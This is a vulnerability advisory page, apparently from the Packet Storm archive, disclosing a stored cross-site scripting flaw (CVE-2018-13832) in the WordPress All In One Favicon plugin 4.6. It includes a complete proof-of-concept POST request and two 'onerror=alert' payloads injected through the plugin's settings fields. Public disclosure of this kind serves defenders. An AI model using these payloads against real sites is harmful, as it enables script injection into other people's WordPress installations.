what you don't know can hurt you

WordPress All In One Favicon 4.6 Cross Site Scripting

WordPress All In One Favicon 4.6 Cross Site Scripting
Posted Jul 19, 2018
Authored by Javier Olmedo

WordPress All In One Favicon plugin version 4.6 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2018-13832
MD5 | 4e1fd052af536e388490d26a91809868

WordPress All In One Favicon 4.6 Cross Site Scripting

Change Mirror Download
# Exploit Title: WordPress Plugin All In One Favicon <= 4.6 - Authenticated Multiple XSS Persistent
# Date: 2018-07-10
# Exploit Author: Javier Olmedo

# Website: https://hackpuntes.com/
# Vendor Homepage: http://www.techotronic.de/
# Software Link: https://wordpress.org/plugins/all-in-one-favicon/
# Version/s: 4.6 and below
# Patched Version: unpatched
# CVE : 2018-13832
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099

Plugin description:
All In One Favicon adds favicons to your site and your admin pages. You can either use favicons you already uploaded or use the builtin upload mechanism to upload a favicon to your WordPress installation.

Description:
WordPress Plugin All In One Favicon before 4.6 allows remote authenticated users to execute javascript code through XSS Persistent attacks.

Technical details:

The following parameters are vulnerable:
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text

Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs as an authenticated user with permissions:

POST /wordpress/wp-admin/admin-post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
Content-Type: multipart/form-data; boundary=---------------------------168911549614148
Content-Length: 3407
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------168911549614148
Content-Disposition: form-data; name="_wpnonce"

9df031414d
-----------------------------168911549614148
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
-----------------------------168911549614148
Content-Disposition: form-data; name="option_page"

aio-favicon_settings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[frontendICO-text]"

"><img src=a onerror=alert(1)>
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aioFaviconUpdateSettings"

Guardar cambios
-----------------------------168911549614148

Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[removeLinkFromMetaBox]"

true
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148--

Payloads:
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>

Timeline:
15/03/2018 I send the report. (no answer)
27/05/2018 I send the report, again. (no answer)
10/07/2018 Public disclosure.

References:
https://hackpuntes.com/cve-2018-13832-wordpress-plugin-all-in-one-favicon-4-6-autenticado-multiples-cross-site-scripting-persistentes/


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    29 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close